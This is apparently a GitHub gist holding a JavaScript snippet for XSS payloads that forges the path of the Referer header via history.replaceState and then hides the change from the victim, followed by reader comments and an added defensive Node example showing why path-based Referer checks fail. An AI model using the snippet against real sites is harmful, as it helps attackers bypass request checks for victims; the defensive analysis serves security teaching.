Gist: hoodoer/c4eb12b99d5902119fb30e8343b5b228
```javascript
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;

// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');

// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);

// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);
```
Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using JavaScript?
There is a URL I need to be able to access directly; however, the target host does not let me access it directly unless the referer is said host.
@alkanna I'm afraid not, just the relative path.
@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but it might be possible. Would be fun to play with for sure.
Is it possible to change the entire referrer header? Not just the "/this-is-my-fake-referer-value" part. Is it possible to change it to something like "http://referer.com"?
I'm afraid not, you can only control the relative path under the host.
A blog post walking through this technique in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/
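The exchange above boils down to one browser rule: `history.replaceState()` accepts any same-origin URL, so a script can rewrite the path (and query) that later shows up in `Referer`, but it cannot rewrite the scheme or host. The following is an added example, not code from the gist or from the blog post linked above, written from the server's side of the table: it models that rule with Node's `URL` class, computes the `Referer` a same-origin request would carry, and runs both a path-based and an origin-based Referer gate against the forged value to show what each one actually proves. The site `https://app.example`, the gated path `/admin/report` and the page `/profile` are constructed values for the demonstration.

```javascript
// Added example (not part of the gist). Models the browser constraint the
// comments discuss and tests server-side Referer gates against a forged value.
// Constructed assumptions: site https://app.example, gated path /admin/report,
// script running on the page /profile.

// Mirrors history.replaceState(): the new URL is resolved against the document
// URL and must share its origin; a cross-origin URL makes the browser throw a
// SecurityError instead of changing anything.
function simulateReplaceState(documentHref, newUrl) {
  const current = new URL(documentHref);
  const target = new URL(newUrl, current);
  if (target.origin !== current.origin) {
    throw new Error('SecurityError: replaceState URL must be same-origin');
  }
  return target.href;
}

// The Referer a same-origin request carries: the document URL minus fragment
// and credentials (the default strict-origin-when-cross-origin policy sends the
// full URL for same-origin requests).
function referrerFor(documentHref) {
  const u = new URL(documentHref);
  u.hash = '';
  u.username = '';
  u.password = '';
  return u.href;
}

// Weak gate: trusts the path component of Referer. Any script on the origin can
// set this component with replaceState, so it proves nothing.
function gateByReferrerPath(headers, allowedPath) {
  if (!headers.referer) return false;
  return new URL(headers.referer).pathname === allowedPath;
}

// Origin-only gate: looks at the part replaceState cannot change. It still only
// tells you "some page on this origin sent the request", which is exactly what
// an XSS foothold already gives the attacker, so it is not authorization either.
function gateByReferrerOrigin(headers, allowedOrigin) {
  if (!headers.referer) return false;
  return new URL(headers.referer).origin === allowedOrigin;
}

// Walk through the gist's swap/send/restore sequence with the constructed values.
function demo() {
  const site = 'https://app.example';
  let docHref = site + '/profile?tab=1#top';
  const result = {};

  // Before the swap: a request from /profile fails a gate that wants /admin/report.
  result.beforePath = gateByReferrerPath({ referer: referrerFor(docHref) }, '/admin/report');

  // The swap: same-origin path rewrite succeeds and changes the Referer value.
  docHref = simulateReplaceState(docHref, '/admin/report');
  result.forgedReferer = referrerFor(docHref);
  result.afterPath = gateByReferrerPath({ referer: result.forgedReferer }, '/admin/report');
  result.afterOrigin = gateByReferrerOrigin({ referer: result.forgedReferer }, site);

  // The host part cannot be changed this way (the question asked in the comments).
  try {
    simulateReplaceState(docHref, 'http://referer.com/anything');
    result.crossOriginAllowed = true;
  } catch (e) {
    result.crossOriginAllowed = false;
  }
  return result;
}

console.log(demo());
```

Run it with `node` and the printed object shows `beforePath: false`, `afterPath: true`, `afterOrigin: true` and `crossOriginAllowed: false`: the path gate flips from deny to allow on a value the page's own script chose, the origin gate never distinguished the forged request from a legitimate one, and the cross-origin rewrite is refused. The practical conclusion for a defender is that the path and query of `Referer` are client-controlled data and must not feed authorization decisions; the origin component is the only part that survives this trick, and even that is only a weak hint.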